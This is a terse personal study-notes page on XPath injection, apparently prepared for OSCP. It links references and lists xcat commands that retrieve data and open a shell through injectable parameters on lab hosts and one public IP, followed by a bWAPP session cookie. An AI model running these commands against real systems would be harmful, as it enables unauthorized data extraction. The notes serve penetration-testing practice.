xpath injection - My-oscp-all-things

[xpath注入详解 - 渗透测试中心 - 博客园](https://www.cnblogs.com/backlion/p/8554749.html) [Site Unreachable](https://github.com/orf/xcat_app) xcat ``` xcat.py --method=GET --public-ip="192.168.91.139" http://192 .168.91.139/xml/example2.php name=hacker name "Hello hacker" run retrieve `xcat run http://localhost:4567 query query=Rogue --true-string=Lawyer` `xcat shell http://localhost:4567 query query=Rogue --true-string=Lawyer` xcat.py --method=GET --public-ip="124.70.71.251" http://124.70.71.251:48461/demo.php name=xml name "Hello hacker" run retrieve ``` bwapp ``` ad-con=a%3A2%3A%7Bs%3A4%3A%26quot%3Bdate%26quot%3B%3Bs%3A10%3A%26quot%3B2021-11-16%26quot%3B%3Bs%3A3%3A%26quot%3Bads%26quot%3B%3Ba%3A0%3A%7B%7D%7D; _us=1637121497; security_level=0; PHPSESSID=tgvuj7470891ivsvv0j6adrb03 ```